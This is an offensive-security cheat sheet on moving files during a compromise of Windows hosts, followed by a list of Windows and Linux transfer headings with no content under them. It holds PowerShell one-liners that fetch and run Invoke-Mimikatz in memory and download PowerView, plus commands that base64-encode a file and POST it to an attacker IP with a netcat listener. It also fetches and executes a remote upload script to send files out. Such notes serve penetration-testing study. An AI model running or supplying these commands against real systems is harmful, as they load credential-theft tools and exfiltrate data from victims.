File Transfers
Windows
Download a file with PowerShell
Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1
Invoke-WebRequest -Uri "https://<snip>/PowerView.ps1" -OutFile "PowerView.ps1"
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
iwr -uri https://<snip>/PowerView.ps1 -Outfile PowerView.ps1Execute a file in memory using PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')Upload a file with PowerShell
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\file' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
# Attacker machine
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hostsUpload a file with PowerShell using uploadserver
# start Upload server on port 4444
python3 -m uploadserver 4444
raven
# Past PSUpload.ps1 script into PowerShell or download it
https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
# Upload the file
Invoke-FileUpload -Uri http://<IP>:<Port>/upload -File C:\fileFile Transfers with Powercat
Invoke-WebRequest using a Chrome User Agent
File transfer using SMB
Download a file using FTP
Upload a file using FTP
File transfer with base64 encoding
File transfer with WebDav
Download a file using JavaScript and cscript.exe
File transfer using WinRM
File transfer with RDP
Download a file using Bitsadmin
Download a file using Certutil
Linux
Download a file using Wget / cURL / PHP
File transfer with SCP
File Transfer with Netcat and Ncat
File Transfer with Socat
Creating a Web Server
Encode File en base64
Last updated